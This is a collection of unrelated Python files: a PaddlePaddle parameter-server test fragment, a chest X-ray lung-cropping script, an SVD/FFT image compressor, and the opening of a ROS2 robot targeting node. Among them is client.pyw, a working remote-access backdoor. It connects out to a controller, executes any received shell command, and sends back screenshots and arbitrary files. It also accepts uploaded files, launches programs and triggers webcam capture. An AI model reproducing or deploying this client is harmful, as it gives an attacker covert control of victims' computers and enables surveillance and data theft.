outputs={'Out': [origin]},
attrs={'file_path': model_file})
load_block.append_op(
type='load',
inputs={},
outputs={'Out': [slice0]},
attrs={
'file_path': model_file,
'seek': 2 * 8,
'shape': slice0.shape
})
load_block.append_op(
type='load',
inputs={},
outputs={'Out': [slice1]},
attrs={
'file_path': model_file,
'seek': 5 * 8,
'shape': slice1.shape
})
exe = fluid.Executor(place=fluid.CPUPlace())
exe.run(load_prog)
origin_var = fluid.global_scope().find_var("var.origin")
slice0_var = fluid.global_scope().find_var("var.slice0")
slice1_var = fluid.global_scope().find_var("var.slice1")
origin = np.array(origin_var.get_tensor())
slice0 = np.array(slice0_var.get_tensor())
slice1 = np.array(slice1_var.get_tensor())
np.testing.assert_equal(origin[2:5], slice0)
np.testing.assert_equal(origin[5:10], slice1)
def _save_by_io_persistables(self, place, port0, port1, dirname, var_name):
self._run_nce_op_two_pserver(place, port0, port1,
os.path.join(dirname, var_name))
def test_recv_save_op_remote(self):
# run pserver on CPU in sync mode
p0 = self._start_pserver(0, run_pserver)
self._wait_ps_ready(p0.pid)
port0 = self._get_pserver_port(p0.pid)
p1 = self._start_pserver(1, run_pserver)
self._wait_ps_ready(p1.pid)
port1 = self._get_pserver_port(p1.pid)
places = [core.CPUPlace()]
param_dir = "./model_for_test_recv_save_op/"
param_name = "table"
for place in places:
self._save_by_io_persistables(place, port0, port1, param_dir,
param_name)
# raise SIGTERM to pserver
os.kill(p0.pid, signal.SIGINT)
p0.join()
os.kill(p1.pid, signal.SIGINT)
p1.join()
self._load_slice_var(param_dir + param_name)
shutil.rmtree(param_dir)
if __name__ == '__main__':
unittest.main()
|
crop_img.py
|
import numpy as np
from skimage import io, color, exposure, img_as_float, transform, util
from matplotlib import pyplot as plt
import pathlib
import cv2
import multiprocessing
import time
import argparse
from keras.models import load_model
from keras.preprocessing.image import ImageDataGenerator
import os
def load_CXR_from_list(filelist, im_shape):
X = np.zeros((len(filelist), im_shape[0], im_shape[1], 1))
resized_raw = np.zeros((len(filelist), im_shape[0], im_shape[1]))
raw_images = []
for k, file in enumerate(filelist):
if file.suffix.lower() in ['.jpg', '.png', '.jpeg'] :
print('loading ' + file.name)
img = img_as_float(io.imread(file, as_gray = True))
raw_images.append(img)
img = transform.resize(img, im_shape)
resized_raw[k, ...] = img
img = exposure.equalize_hist(img)
img = np.expand_dims(img, -1)
X[k, ...] = img
# X = np.array(X)
# resized_raw = np.array(resized_raw)
X -= X.mean()
X /= X.std()
print ('### Dataset loaded')
print ('X shape ={} \t raw_resized shape = {}'.format(X.shape, resized_raw.shape))
print ('\tX:{:.1f}-{:.1f}\n'.format(X.min(), X.max()))
print ('\tX.mean = {}, X.std = {}'.format(X.mean(), X.std()))
return X, resized_raw, raw_images
def masked(img, mask, alpha=1):
"""Returns image with GT lung field outlined with red, predicted lung field
filled with blue."""
rows, cols = img.shape
color_mask = np.zeros((rows, cols, 3))
color_mask[..., 2] = mask / 255
img_color = np.dstack((img, img, img))
img_hsv = color.rgb2hsv(img_color)
color_mask_hsv = color.rgb2hsv(color_mask)
img_hsv[..., 0] = color_mask_hsv[..., 0]
img_hsv[..., 1] = color_mask_hsv[..., 1] * alpha
img_masked = color.hsv2rgb(img_hsv)
return img_masked
def draw_spine(img, spine_pos):
if len(img.shape) == 2:
img_color = np.dstack((img, img, img))
elif len(img.shape) == 3 and img.shape[2] == 1:
squeezed = np.squeeze(img)
img_color = np.dstack((squeezed, squeezed, squeezed))
elif len(img.shape) == 3 and img.shape[2] == 3:
img_color = np.copy(img)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
cv2.rectangle(img_color, (spine_pos, 0), (spine_pos, img.shape[0]), color = (0.8, 0 , 0), thickness = int(round(max(img.shape) * 0.02)))
return img_color
def draw_bbox(img, bbox):
'''
input img, and bounding box
return a color RGB image (img.shape, 3) with bounding box drawn
original img is not changed.
'''
if len(img.shape) == 2:
img_color = np.dstack((img, img, img))
elif len(img.shape) == 3 and img.shape[2] == 1:
squeezed = np.squeeze(img)
img_color = np.dstack((squeezed, squeezed, squeezed))
elif len(img.shape) == 3 and img.shape[2] == 3:
img_color = np.copy(img)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
if not (bbox is None):
left, top, right, bottom = bbox
cv2.rectangle(img_color, (left, top), (right, bottom), color = (0, 0.8, 0), thickness = int(round(max(img.shape) * 0.01)))
return img_color
def join_path_from_list(cur_path, path_list):
for folder in path_list:
cur_path = cur_path.joinpath(folder)
return cur_path
def change_first_folder(data_path, attached_str):
to_return = data_path.copy()
to_return[0] = to_return[0] + attached_str
return to_return
def select_spine(img):
sumpix0 = np.sum(img, axis = 0)
max_r2 = np.int_(len(sumpix0) / 3) + np.argmax(sumpix0[ np.int_(len(sumpix0) / 3): np.int_(len(sumpix0)* 2 / 3)])
return max_r2
def mirror(spine_pos, pos):
if pos < spine_pos:
return spine_pos + (spine_pos - pos)
else:
return spine_pos - (pos - spine_pos)
def left_right(label_map, label, spine_pos):
left_chunk_size = np.sum(label_map[:, 0 : spine_pos] == label)
right_chunk_size = np.sum(label_map[:, spine_pos + 1 :] == label)
if left_chunk_size > right_chunk_size:
return 'left'
elif left_chunk_size < right_chunk_size:
return 'right'
else:
return 'mid'
def select_lung(pred, resized_raw, cut_thresh, debug, filename,out_pad_size, k_size = 5):
opened = cv2.morphologyEx(pred, cv2.MORPH_OPEN, kernel = np.ones((k_size, k_size)))
cnt, label_map, stats, centriods = cv2.connectedComponentsWithStats(opened)
# index sorted by area, from large to small, first one is the background
idx_sorted = np.argsort(stats[:, cv2.CC_STAT_AREA])[::-1]
stats = stats[idx_sorted]
# remove small connected region
if debug:
print(stats)
stats = stats[stats[:, cv2.CC_STAT_AREA] > cut_thresh * np.prod(pred.shape)]
# only save the largest two or
denoised = np.zeros(opened.shape, dtype = np.uint8)
for i in range(1, min(stats.shape[0], 3)):
denoised[label_map == idx_sorted[i]] = 255
spine_pos = select_spine(resized_raw)
if stats.shape[0] < 3:
if stats.shape[0] == 1:
print(filename + ' No large enough area Detected!!!')
return denoised, None, spine_pos
else:
print(filename + ' Single Lung Detected !!!')
top = stats[1, cv2.CC_STAT_TOP]
bottom = stats[1, cv2.CC_STAT_TOP] + stats[1, cv2.CC_STAT_HEIGHT]
left = stats[1, cv2.CC_STAT_LEFT]
right = stats[1, cv2.CC_STAT_LEFT] + stats[1, cv2.CC_STAT_WIDTH]
left_mirror = mirror(spine_pos, left)
right_mirror = mirror(spine_pos, right)
left = min(left, right_mirror)
right = max(right, left_mirror)
else:
left = min(stats[1, cv2.CC_STAT_LEFT], stats[2, cv2.CC_STAT_LEFT])
top = min(stats[1, cv2.CC_STAT_TOP], stats[2, cv2.CC_STAT_TOP])
right = max(
stats[1, cv2.CC_STAT_LEFT] + stats[1, cv2.CC_STAT_WIDTH],
stats[2, cv2.CC_STAT_LEFT] + stats[2, cv2.CC_STAT_WIDTH]
)
bottom = max(
stats[1, cv2.CC_STAT_TOP] + stats[1, cv2.CC_STAT_HEIGHT],
stats[2, cv2.CC_STAT_TOP] + stats[2, cv2.CC_STAT_HEIGHT]
)
chunk1_side = left_right(label_map, 1, spine_pos)
chunk2_side = left_right(label_map, 2, spine_pos)
# print('chunk1 on' + chunk1_side + ' chunk2 on ' + chunk2_side)
if chunk1_side == chunk2_side:
print(filename + ' two chunks on the same side!!!')
left_mirror = mirror(spine_pos, left)
right_mirror = mirror(spine_pos, right)
left = min(left, right_mirror)
right = max(right, left_mirror)
bbox = np.array([left, top, right, bottom])
bbox = out_pad(bbox, denoised.shape, out_pad_size)
# boxed = cv2.rectangle(denoised, (bbox[0], bbox[1]), (bbox[2], bbox[3]), color = 255, thickness=3)
# return denoised, bbox, denoised_no_bbox, raw_bbox
return denoised, bbox, spine_pos
def out_pad(bbox_in, shape, out_pad_size):
left, top, right, bottom = bbox_in
left = max(0, left - out_pad_size)
# right = min(shape[1] - 1, right + out_pad_size)
right = min(shape[1] , right + out_pad_size)
top = max(0, top - out_pad_size)
# bottom = min(shape[0] - 1, bottom + out_pad_size)
bottom = min(shape[0], bottom + out_pad_size)
bbox_padded = np.array([left, top, right, bottom])
return bbox_padded
def square_helper(start, finish, expand1, expand2, size_limit):
new_start = max(0, start - expand1)
expand1_rem = expand1 - (start - new_start)
new_finish = min(size_limit , finish + expand2)
expand2_rem = expand2 - (new_finish - finish)
# print('expand1_rem = ', expand1_rem, ' expand2_rem = ', expand2_rem)
if expand1_rem > 0 and expand2_rem == 0:
new_finish = min(size_limit, new_finish + expand1_rem)
elif expand1_rem == 0 and expand2_rem > 0:
new_start = max(0, new_start - expand2_rem)
return new_start, new_finish
def square_bbox(img_shape, raw_bbox):
if raw_bbox is None:
return None
# img_shape = denoised_no_bbox.shape
left, top, right, bottom = raw_bbox
width = right - left
height = bottom - top
center = [round((left + right) / 2), round((top + bottom) / 2)]
diff = abs(width - height)
expand1 = diff // 2
expand2 = diff - expand1
sqaured_bbox = np.copy(raw_bbox)
# print('expand1 = ', expand1, ' expand2 = ', expand2)
if width > height:
new_top, new_bottom = square_helper(top, bottom, expand1, expand2, img_shape[0])
sqaured_bbox = np.array([left, new_top, right, new_bottom])
elif width < height:
new_left, new_right = square_helper(left, right, expand1, expand2, img_shape[1])
sqaured_bbox = np.array([new_left, top, new_right, bottom])
# print('original bounding box:' + str(raw_bbox))
# print('squared bounding box:' + str(sqaured_bbox))
return sqaured_bbox
def bbox_mask_and_crop(raw_img, bbox):
'''
return the cropped image, bounding box mask, and the bounding box itself.
'''
if bbox is None:
return raw_img, bbox
left, top, right, bottom = bbox
cropped_img = raw_img[
top : bottom,
left : right
]
return cropped_img, bbox
def square_crop(raw_img, raw_bbox):
if raw_bbox is None:
return raw_img, raw_bbox
sqaured_bbox = square_bbox(raw_img.shape, raw_bbox)
return bbox_mask_and_crop(raw_img, sqaured_bbox)
def crop_lung(raw_img, cur_shape, bbox):
if bbox is None:
return raw_img, None
if len(bbox) != 4:
raise ValueError('WRONG length of bounding box')
left, top, right, bottom = bbox
raw_height = raw_img.shape[0]
raw_width = raw_img.shape[1]
cur_height = cur_shape[0]
cur_width = cur_shape[1]
# print('Bounding box = {}'.format(bbox))
# print('raw shape = {}'.format(raw_img.shape))
# print('cur shape = {}'.format(cur_shape))
lung_top = int(round(top / cur_height * raw_height))
lung_bottom = int(round(bottom / cur_height * raw_height))
lung_left = int(round(left / cur_width * raw_width))
lung_right = int(round(right / cur_width * raw_width))
# print('lung left = {} right = {} top = {} bottom = {} '.format(lung_left, lung_right, lung_top, lung_bottom))
lung_img = raw_img[
lung_top : lung_bottom,
lung_left : lung_right
]
# print('lung shape = {}'.format(lung_img.shape))
raw_bbox = np.array([lung_left, lung_top, lung_right, lung_bottom])
return bbox_mask_and_crop(raw_img, raw_bbox)
def pretty(filename, char_per_line):
return '\n'.join(filename[i : i + char_per_line] for i in range(0, len(filename), char_per_line))
def single_img_crop(img, resized_raw_img, raw_img, file_path, UNet, result_folder,
im_shape = (256, 256), cut_thresh = 0.02, out_pad_size = 8, debug_folder = None , debugging = False):
'''
Crop out the lung area from CXR for single images\n
lung prediction based on UNet
Parameters
----------
img : np array
acceptable shape: (n, x, x, 1), (n, x, x), (x, x, 1), (x, x)
where n is the number of images; x is the input_shape, by default 256
resized_raw_img : np array
raw sized image, with shape of (x, x);
see load_CXR_from_list for details
raw_img : np array
original raw image;
see load_CXR_from_list for details
UNet: loaded UNet model from https://github.com/imlab-uiip/lung-segmentation-2d
path to UNet
result_folder : preferrebly pathlib object
path to output
im_shape : tuple
specify the input image shape of UNet, by default (256, 256)
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
debug_folder : preferrebly pathlib object
path to debug images; if not specified, no debug images will be written to local
debugging: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
Returns
----------
lung_img : np array
cropped lung area (not neccessarily squared)
lung_img_squared :
cropped lung area (squared if possible)
'''
# we need (n, x, x, 1) format for input of Unet
# n is the number of images
# x is the input shape, by default 256
if len(img.shape) == 4 and img.shape[1: -1] == im_shape and img.shape[-1] == 1:
# format (n, x, x, 1)
pass
elif len(img.shape) == 2 and img.shape == im_shape:
# format (x, x)
img = np.expand_dims(img, axis = (0, -1))
elif len(img.shape) == 3 and img.shape[:2] == im_shape and img.shape[-1] == 1:
# format (x, x, 1)
img = np.expand_dims(img, axis = 0)
elif len(img.shape) == 3 and img.shape[1:] == im_shape:
# format (n, x, x)
img = np.expand_dims(img, axis = -1)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
if not (debug_folder is None) or debugging:
fig, axes = plt.subplots(2, 2, figsize = (8, 8))
fig2, axes2 = plt.subplots(1, 3, figsize = (18, 6))
pred = np.squeeze(UNet.predict(img))
pr = (pred > 0.5).astype(np.uint8)
if not file_path == None:
filename = file_path.stem
suffix = file_path.suffix
print('outputting result for ' + filename)
denoised, raw_bbox, spine_pos = select_lung(pr, resized_raw_img, cut_thresh = cut_thresh, debug = debugging, filename = filename, out_pad_size = out_pad_size)
# denoised_sqaured, sqaured_bbox = square_bbox(denoised_no_bbox, raw_bbox)
lung_img, nonSquared_bbox = crop_lung(raw_img, im_shape, raw_bbox)
lung_img_squared, sqaured_bbox = square_crop(raw_img, nonSquared_bbox)
lung_img = util.img_as_ubyte(lung_img)
lung_img_squared = util.img_as_ubyte(lung_img_squared)
if not (debug_folder is None) or debugging:
axes[0, 0].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_resized_raw')
axes[0, 0].imshow(resized_raw_img, cmap='gray')
axes[0, 0].set_axis_off()
axes[1, 0].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_rawpred')
axes[1, 0].imshow(pr ,cmap='gray')
axes[1, 0].set_axis_off()
axes[0, 1].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_denoised_pred')
axes[0, 1].imshow(denoised, cmap='gray')
axes[0, 1].set_axis_off()
axes[1, 1].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_denoised_masked')
area_masked = masked(resized_raw_img, denoised, alpha = 0.6)
bbox_drawn = draw_bbox(area_masked, raw_bbox)
spine_drawn = draw_spine(bbox_drawn, spine_pos)
axes[1, 1].imshow(spine_drawn)
axes[1, 1].set_axis_off()
fig.tight_layout()
axes2[0].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'raw_img')
axes2[0].imshow(raw_img, cmap='gray')
# axes2[0].set_axis_off()
axes2[1].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'unsquared_boudning_box' + '\n' + str(nonSquared_bbox))
axes2[1].imshow(draw_bbox(raw_img, nonSquared_bbox))
# axes2[1].set_axis_off()
axes2[2].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'squared_boudning_box'+ '\n' + str(sqaured_bbox))
axes2[2].imshow(draw_bbox(raw_img, sqaured_bbox))
fig.tight_layout()
if debugging:
plt.show()
elif not (debug_folder is None):
out_path = debug_folder.joinpath(filename + '_debug_resized_scale' + suffix)
fig.savefig(str(out_path))
out_path = debug_folder.joinpath(filename + '_debug_rawscale' + suffix)
fig2.savefig(str(out_path))
if not debugging:
if not result_folder == None:
result_sub = result_folder.joinpath('crop')
result_sub.mkdir(parents=True, exist_ok=True)
out_path = result_sub.joinpath(filename + '_crop' + suffix)
io.imsave(str(out_path), lung_img )
result_sub = result_folder.joinpath('crop_squared')
result_sub.mkdir(parents=True, exist_ok=True)
out_path = result_sub.joinpath(filename + '_crop_squared' + suffix)
io.imsave(str(out_path), lung_img_squared )
if not (debug_folder is None) or debugging:
plt.close(fig)
plt.close(fig2)
return lung_img, lung_img_squared
def lungseg_fromdata(X, resized_raw, raw_images, file_paths, UNet, result_folder,
im_shape = (256, 256), cut_thresh = 0.02, out_pad_size = 8, debug_folder = None ,debugging = False):
# tf.debugging.set_log_device_placement(True)
# print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))
# with tf.device('/GPU:0'):
n_test = X.shape[0]
inp_shape = X[0].shape
UNet = load_model(UNet, compile=False)
print('n_test = {}'.format(n_test))
# For inference standard keras ImageGenerator can be used.
test_gen = ImageDataGenerator(rescale=1.)
i = 0
for xx in test_gen.flow(X, batch_size=1, shuffle=False):
single_img_crop(
img = xx,
resized_raw_img = resized_raw[i],
raw_img = raw_images[i],
file_path = file_paths[i],
UNet = UNet,
result_folder = result_folder,
im_shape = im_shape,
cut_thresh = cut_thresh,
out_pad_size = out_pad_size,
debug_folder = debug_folder,
debugging = debugging
)
i += 1
if i == n_test:
break
print('Thread done')
def gen_idx(length, k_fold):
idxs = np.array([length // k_fold] * k_fold)
idxs[:length % k_fold] = idxs[:length % k_fold] + 1
start_points = np.cumsum(idxs)
start_points = [0] + list(start_points)
return start_points
def adjust_process_num(length):
if length < 20:
k_fold = 1
elif length < 100:
k_fold = 4
elif length < 400:
k_fold = 8
elif length < 1000:
k_fold = 16
else:
k_fold = 24
return k_fold
def lungseg_one_process(result_folder, UNet, filenames,
im_shape = (256, 256), debug_folder = None, cut_thresh = 0.02, out_pad_size = 8, debug = False):
X, resized_raw, raw_images = load_CXR_from_list(filenames, im_shape)
print('X shape = ', X.shape)
lungseg_fromdata(X, resized_raw, raw_images, filenames, UNet, result_folder,
im_shape = im_shape, cut_thresh = cut_thresh, out_pad_size = out_pad_size, debug_folder = debug_folder, debugging = debug)
def singlefolder_lungseg(data_path, result_folder, UNet, debug_folder = None, k_fold = None, cut_thresh = 0.02, out_pad_size = 8, debug = False, filenames = None):
'''
Crop out the lung area from CXR\n
lung prediction based on UNet: https://github.com/imlab-uiip/lung-segmentation-2d
Parameters
----------
data_path : preferrebly pathlib object
all images in that path will be loaded for lung segmentation if filenames not specified.
result_folder : preferrebly pathlib object
path to output
UNet: preferrebly pathlib object
path to UNet
debug_folder : preferrebly pathlib object
path to debug images; if not specified, no debug images will be written to local
k_fold: int
Specify how many processes to create to finish this task.
If None, processes are created based on adjust_process_num function
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
debug: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
filenames: list
If specified, load these images instead of loading all images in data_path.
Absolute paths needed.
'''
data_path = pathlib.Path(data_path)
result_folder = pathlib.Path(result_folder)
result_folder.mkdir(parents=True, exist_ok=True)
if not debug_folder is None:
debug_folder = pathlib.Path(debug_folder)
debug_folder.mkdir(parents=True, exist_ok=True)
im_shape = (256, 256)
chunknum = 0
chunksize = 500
print('processing data in ' + str(data_path))
if filenames is None:
filenames = list(data_path.glob('*'))
totalfiles = len(filenames)
while chunknum * chunksize < totalfiles:
start = chunknum * chunksize
end = min(totalfiles, (chunknum + 1) * chunksize)
print('segmenting {} files of folder {}'.format((start, end), str(data_path)))
curfiles = filenames[start : end]
if debug:
lungseg_one_process(result_folder, UNet, curfiles,
im_shape = im_shape, debug_folder = debug_folder, cut_thresh = cut_thresh, out_pad_size = out_pad_size, debug = debug)
return
start_time = time.time()
keywords = {
'im_shape' : im_shape,
'cut_thresh' : cut_thresh,
'out_pad_size' : out_pad_size,
'debug_folder' : debug_folder,
'debug' : debug
}
if k_fold is None:
k_fold = adjust_process_num(len(curfiles))
print('Running using {} process'.format(k_fold))
start_idxs = gen_idx(len(curfiles), k_fold)
pool = []
for k in range(k_fold):
# attention here the slicing is wrong!!
# we missed the last a few images
arg_str = (
result_folder,
UNet,
curfiles[start_idxs[k]: start_idxs[k + 1]]
)
p = multiprocessing.Process(target = lungseg_one_process, args = arg_str, kwargs = keywords)
p.start()
pool.append(p)
for p in pool:
p.join()
print('{} processes takes {} seconds'.format(k_fold, time.time() - start_time))
chunknum = chunknum + 1
def genlist(data_path_list, list_dict):
cur_dict = list_dict
for i in range(len(data_path_list)):
if i > 0:
cur_dict = cur_dict[data_path_list[i]]
# print(cur_dict)
if type(cur_dict) == list:
return cur_dict
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--folder', type=str, help = 'the directory of the image folder')
parser.add_argument('-U', '--Unet', type = str, help = 'the directory of the saved Unet weights')
parser.add_argument('-o', '--output', type = str, help = 'the directory of the resized image')
args = parser.parse_args()
UNet_path = args.Unet
folder_path = os.path.normpath(args.folder)
output_path = os.path.normpath(args.output)
if not os.path.isdir(folder_path):
containing_folder = os.path.dirname(folder_path)
singlefolder_lungseg(containing_folder, output_path, UNet_path, out_pad_size=8, debug=False, filenames=[pathlib.Path(folder_path)])
else:
singlefolder_lungseg(folder_path, output_path, UNet_path, out_pad_size=8, debug=False)
print('Completed!')
# # single image lung segmentation
# from keras.models import load_model
# parent_path = pathlib.Path(__file__).absolute().parent
# data_path = parent_path.parent.joinpath('NMHFiles_sample', 'Negative')
# img_path = data_path.joinpath('8356_47cfe01e37c2237dd6a31b424473c89f_AP_2.png')
# UNet = load_model(UNet_path)
# im_shape = (256, 256)
# X, resized_raw, raw_images = load_CXR_from_list([img_path], im_shape)
# result_folder = parent_path.parent.joinpath('NMHFiles_sample_crop', 'Negative')
# single_img_crop(X[0], resized_raw[0], raw_images[0], img_path, UNet, result_folder, debugging = True)
# print('Total time = {}'.format(time.time() - start))
|
imgc.py
|
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from math import log10, sqrt
from matplotlib.image import imread
import matplotlib.pyplot as plt
import os
from skimage import metrics
import cv2
import sys
import itertools
import threading
import time
import os
filename = sys.argv[-1]
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rCompressing ' + c)
sys.stdout.flush()
time.sleep(0.1)
t = threading.Thread(target=animate)
t.start()
def PSNR(original, compressed):
mse = np.mean((original - compressed) ** 2)
if(mse == 0): # MSE is zero means no noise is present in the signal .
# Therefore PSNR have no importance.
return 100
max_pixel = 255.0
psnr = 20 * log10(max_pixel / sqrt(mse))
return psnr
#plt.rcParams['figure.figsize'] = [10, 10]
#plt.rcParams.update({'font.size': 10})
image = np.array(Image.open(filename))
image = image / 255
row, col, _ = image.shape
image_red = image[:, :, 0]
image_green = image[:, :, 1]
image_blue = image[:, :, 2]
U_r, d_r, V_r = np.linalg.svd(image_red, full_matrices=True)
U_g, d_g, V_g = np.linalg.svd(image_green, full_matrices=True)
U_b, d_b, V_b = np.linalg.svd(image_blue, full_matrices=True)
#Parameters
k=190
keep=0.5
U_r_k = U_r[:, 0:k]
V_r_k = V_r[0:k, :]
U_g_k = U_g[:, 0:k]
V_g_k = V_g[0:k, :]
U_b_k = U_b[:, 0:k]
V_b_k = V_b[0:k, :]
d_r_k = d_r[0:k]
d_g_k = d_g[0:k]
d_b_k = d_b[0:k]
image_red_a = np.dot(U_r_k, np.dot(np.diag(d_r_k), V_r_k))
image_green_a = np.dot(U_g_k, np.dot(np.diag(d_g_k), V_g_k))
image_blue_a = np.dot(U_b_k, np.dot(np.diag(d_b_k), V_b_k))
rt = np.fft.fft2(image_red_a)
rtsort = np.sort(np.abs(rt.reshape(-1))) # sort by magnitude
gt=np.fft.fft2(image_green_a)
gtsort=np.sort(np.abs(gt.reshape(-1)))
bt=np.fft.fft2(image_blue_a)
btsort=np.sort(np.abs(bt.reshape(-1)))
threshr = rtsort[int(np.floor((1-keep)*len(rtsort)))]
indr = np.abs(rt)>threshr
rtlow = rt * indr
rlow = np.fft.ifft2(rtlow).real
threshg = gtsort[int(np.floor((1-keep)*len(gtsort)))]
indg = np.abs(gt)>threshg
gtlow = gt * indg
glow = np.fft.ifft2(gtlow).real
threshb = btsort[int(np.floor((1-keep)*len(btsort)))]
indb = np.abs(bt)>threshb
btlow = bt * indb
blow = np.fft.ifft2(btlow).real
image_reconstructed = np.zeros((row, col, 3))
image_reconstructed[:, :, 0] = rlow
image_reconstructed[:, :, 1] = glow
image_reconstructed[:, :, 2] = blow
value = PSNR(image, image_reconstructed)
s = metrics.structural_similarity(image, image_reconstructed,multichannel=True)
name=filename.split(".")
fig = plt.figure(figsize=(5,4))
imgplot = plt.imshow(image_reconstructed)
plt.axis('off')
plt.tight_layout()
plt.savefig(name[0]+"_compressed."+name[-1])
value = PSNR(image, image_reconstructed)
s = metrics.structural_similarity(image, image_reconstructed,multichannel=True)
done = True
print("\n")
print("Image Compressed!!!")
print("PSNR value : ","%.2f" % value,"dB")
print("SSIM ratio : ","%.2f" % s)
|
client.pyw
|
import sys
import socket
from time import sleep
import webbrowser
import os
from threading import Thread
import subprocess
import getpass
try:
from PIL import ImageGrab
except ImportError:
pass
class Client:
def __init__(self, server_ip=None, port=None, name="pc"):
self.name = name
self.server_ip = server_ip
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.data_path = "data.txt"
self.system = sys.platform
if server_ip is None and port is None:
self.check_file()
def check_file(self):
if os.path.exists(self.data_path) and os.path.isfile(self.data_path):
with open(self.data_path, "r") as f:
data = f.read()
self.name, self.server_ip, self.port = data.split("-")
def run(self):
while True:
try:
sleep(1)
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self.server_ip, int(self.port)))
self.s.send(self.name.encode("UTF-8"))
break
except:
continue
while True:
try:
command = self.s.recv(1024).decode("UTF-8")
if command == "check":
self.s.send("connection established".encode("UTF-8"))
elif command == "get name":
self.s.send(self.name.encode("UTF-8"))
elif command == "path mode":
path = os.getcwd().encode("utf-8")
self.s.send(path)
elif command == "startup path":
username = getpass.getuser()
startup_path = "C:/Users/{}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/StartUp".format(username)
if os.path.exists(startup_path):
os.chdir(startup_path)
self.s.send(os.getcwd().encode("UTF-8"))
else:
self.s.send(os.getcwd().encode("UTF-8"))
elif command.startswith("cd "):
try:
os.chdir(command[3:])
self.s.send(os.getcwd().encode("UTF-8"))
except OSError:
self.s.send(os.getcwd().encode("UTF-8"))
elif command.startswith("dir"):
self.send_output(command)
elif command.startswith("web "):
webbrowser.open(command[4:])
elif command == "screenshot":
if "linux" not in self.system:
screenshot_name = "screenshot.jpg"
ImageGrab.grab().save(screenshot_name)
with open(screenshot_name, "rb") as f:
data = f.read()
self.s.send(data)
self.s.send("end".encode("utf-8"))
os.remove(screenshot_name)
else:
self.s.send("error".encode("utf-8"))
elif command == "webcam":
if os.path.exists("webcam_shot.pyw"):
#os.system("start webcam_shot.pyw")
os.startfile("webcam_shot.pyw")
self.s.send("Taking webcam shot.".encode("utf-8"))
else:
self.s.send("File to take webcam shots doesn't exist.".encode("utf-8"))
elif command.startswith("read "):
file = command.split()[1]
if os.path.exists(file) and os.path.isfile(file):
self.s.send("ok".encode("utf-8"))
with open(file, "rb") as f:
data = f.read()
self.s.send(data)
self.s.send("end".encode("utf-8"))
else:
self.s.send("error".encode("utf-8"))
elif command.startswith("send "):
file_name = command.split()[1]
file_data = b""
while True:
data = self.s.recv(1024)
file_data += data
if data.endswith(b"end"):
break
with open(file_name, "wb") as f:
f.write(file_data[:len(file_data) - 3])
self.s.send("File has been written.".encode("utf-8"))
elif command.startswith("start "):
file = command.split()[1]
if os.path.exists(file) and len(file) > 0:
os.startfile(file)
self.s.send("File has been opened.".encode("utf-8"))
else:
self.s.send("File doesn't exist.".encode("utf-8"))
elif command == "close" or command == "reset":
self.s.close()
break
else:
self.send_output(command)
except:
break
sleep(1)
Thread(target=self.run).start()
def send_output(self, command):
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = process.stdout.read() + process.stderr.read()
self.s.send(output)
self.s.send("end".encode("utf-8"))
if __name__ == '__main__':
name = ""
ip = ""
port = 6000
client = Client(ip, port, name)
client.run()
|
deepblaster_targeting_node.py
|
#################################################################################
# Copyright Cloud Brigade, ScratchSpace, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
deepblaster_targeting_node.py
This module decides the action messages (servo control messages, and blaster control messages)
to be sent out using the detection deltas from object_detection_node.
The node defines:
detection_delta_subscriber: A subscriber to the /object_detection_pkg/object_detection_delta
published by the deepblaster_object_detection_pkg with the normalized delta
of the detected object position from the target (reference) position
with respect to x and y axes.
action_publisher: A publisher to publish the actions (servo angles and speed, blaster flywheel
spinup, and trigger values).
"""
import time
import signal
import threading
import math
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import (QoSProfile,
QoSHistoryPolicy,
QoSReliabilityPolicy)
from deepblaster_interfaces_pkg.msg import (BlasterCtrlMsg,
DetectionDeltaMsg)
from deepblaster_targeting_pkg import (constants,
utils)
class DBTargetingNode(Node):
"""Node responsible for deciding the action messages (servo control messages specifically angle
and trigger) to be sent out using the detection deltas from object_detection_node.
"""
def __init__(self, qos_profile):
"""Create a DBTargetingNode.
"""
super().__init__('deepblaster_targeting_node')
self.get_logger().info("deepblaster_targeting_node started.")
# Double buffer to hold the input deltas in x and y from Object Detection.
self.delta_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Create subscription to detection deltas from object_detection_node.
self.detection_delta_subscriber = \
self.create_subscription(DetectionDeltaMsg,
constants.OBJECT_DETECTION_DELTA_TOPIC,
self.detection_delta_cb,
qos_profile)
# Creating publisher to publish action (angle and trigger).
self.action_publisher = self.create_publisher(BlasterCtrlMsg,
constants.ACTION_PUBLISH_TOPIC,
qos_profile)
# Initializing the msg to be published.
